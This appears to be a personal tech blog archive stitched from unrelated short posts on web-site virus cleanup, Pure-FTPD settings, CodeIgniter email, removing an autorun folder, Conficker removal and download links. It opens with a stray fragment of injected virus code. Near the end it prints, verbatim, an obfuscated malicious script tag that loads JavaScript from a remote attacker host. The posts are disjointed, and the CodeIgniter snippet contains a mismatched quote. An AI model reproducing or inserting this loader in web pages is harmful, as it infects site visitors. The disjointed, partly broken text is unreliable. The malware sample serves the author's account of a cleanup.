var D;if(D!='' && D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();

The condition , all index file , index.html or index.php was injected. The virus code injected on last line of file. After couple hour browse I didn’t find any solution to this problem and this make me confused, it will horrible if I have to remove the virus code one by one.

After two hour doing experiment finally I found the way how to remove the virus, just use bash script , using “grep” , “find” , “cut” , “grep” , “xargs” and “sed”.

I just follow the instruction from howtoforge for Pure-FTPD with mysql support. Recently I realize that tutorial dedicated to buid a FTP with no have relation with httpd.

When I try to login to my ftp it can login well but the user will be “read-only” because the FTP home folder owner is apache user. For example my FTP user cacti with home user /var/www/html/cacti.

To accommodate my needs I need to adjust some parameter on pure-ftpd config ( /etc/pure-ftpd/pure-ftpd.conf ) , find “MinUID” string and set it to apache UID / for example on my server apache UID is 48 , now set MinUID to 48. Restart your Pure-FTPD server and test it ^^

http://jquery.andreaseberhard.de/pngFix/

For example , I have use it on http://fk.uns.ac.id

Cheers !!

1. Login To your Yahoo small business, http://smallbusiness.yahoo.com/
2. Click “Access Your Account” on top bar, then “small business”
3. Click “Web Hosting Controll Panel”
4. Click “Create & Update” tab
5. Click “Other Site Building Tools”
6. Click “PHP/Perl Mail”
7. On right side, you must set email sender to use on “From” field, for example I use webmaster
8. Click “Save Default” to set it

Now at CodeIgniter controller we must use email address that have been already set on ‘from’ field, for example I have already set “webmaster@mydomain.com” so here the code example:

## send email to some one
$this->load->library('email');
$config['protocol']     = 'sendmail';
$config['mailpath']     = '/usr/sbin/sendmail -t';
$config['wordwrap']     = TRUE;
$config['useragent']    = 'CI Mailer';
$config['mailtype']     = 'text';
$config['newline']      = "\r\n";

## email contact
$this->email->initialize($config);
$this->email->from('webmaster@mydomain.com');
$this->email->to('recipient@domain.com');
$this->email->subject('Web Visitor");
$message  = "Test Email";

$this->email->message($message);
$this->email->send();
#echo $this->email->print_debugger();

The annoying  problem when I plug my USB pen drive to my own computer with Avira antivirus installed, the Avira Active Guard seem scan the “autorun.inf” folder then Lock It.

When I want to eject my USB pen drive it can’t be done, It said my USB pen drive being used .  I think the the “special” folder created by SmartDav must be removed.

The special folder created by SmartDav can not delete using normal way, it will say “Can not find specific File” or “Invalid Parameter”.  After googling I found some trick how to remove it. Here the trick :

1. Open Command Promt

2. J:\>rd /S \\.\j:\autorun\con\

“J”  is my USB pen drive and It will ask confirmation, hit “Y” to confirm then The autorun.inf folder and it sub folder will automatically deleted

1. select all your table , and right click, it will show table properties, click it !

2. then it will show table properties, click “table” tab on top of it.

3. change “text wrapping”  in to “none”

4. that’s it, you can select some row as your table header

Method that I use is :

1. Unplug / terminate the local area connection.

2. Use rootkit detector to disable some svchost service infected by conficker

You can download the rootkit detector at http://www.gmer.net/ Run the rootkit detector software, if your computer has conficker on it it will detect some svchost service in red colour. You not need do full scan, just right click on red svchost service found by the rootkitdetector, and click disable service.

3. Use conficker removal software

Use this removal software from http://www.enigmasoftware.com/products/conficker-removal-tool/ it very small tool, less than 200Kb software. Download and run the software. Follow the instruction. It need reboot few time.

4. Patch Your Windows with latest hotfix from microsoft to avoid conficker come again. Get the patch on

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx . Download accourding you operating system.

That’s it

http://www.usa.canon.com/dlc/controller?act=GetArticleAct&articleID=3167

Finally today I found some one has post it and I am very very very happy ^.^

Grab it on

http://gunime.blogspot.com/2010/02/gff0013-plan-303e-deep-striker.html

The second attact, the Java script code injected is not same as first one, it have some code variant , The code I was found on my PHP and Javascript code is :

<script>/*Exception*/ document.write('<script src='+'h!&&t^^t#p&(#^:$&^^/&@)/&@@i!!$m@)a^#@g$!e($$)f@^a@&p$&$(-#c!o@!&m^.&h!!!a)t!$!e#n$#a!.!!&&n@e@!).$^$#j^@#^p@^(@.&!&s(!l#i@&d#!e)$s@#h&^a!!r!^e^-@$#n!(@e((t$&#(.)s(u^(p@^!e!)r!)@)t!@&r##u($^e^)l$#)i&!&f&@^e^^.!^r)u^!$:@8@(0#@#!8#$!)0!)!/&^)l&e#&(q(@^u#)!i!)p@(!e&&&^.#!(f#!r)$!/^)l)&@@e)#q^$@u@!!i#^(p$(e!^&.#!f!r$&/@v((k^@.(@c$@&$o^!@m($/&$g&(@)o)!o(@&!g$)!l!$e$$.)!c@$))o#@$^&m@&&^/!p(&c&&&p#!)o#@#p@(.&c#@!o$m$$&/&#!('.replace(/\)|@|\!|#|&|\^|\(|\$/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--2a2a37017f4e478abaa5f3c16a9b2656-->

So I need to modify the cure file for this code variation, and it work fine. Recently I browse on justcode.com and see the new version on cure file it has have ability to cure variant Java Script code that injected to web file. So just try to download it here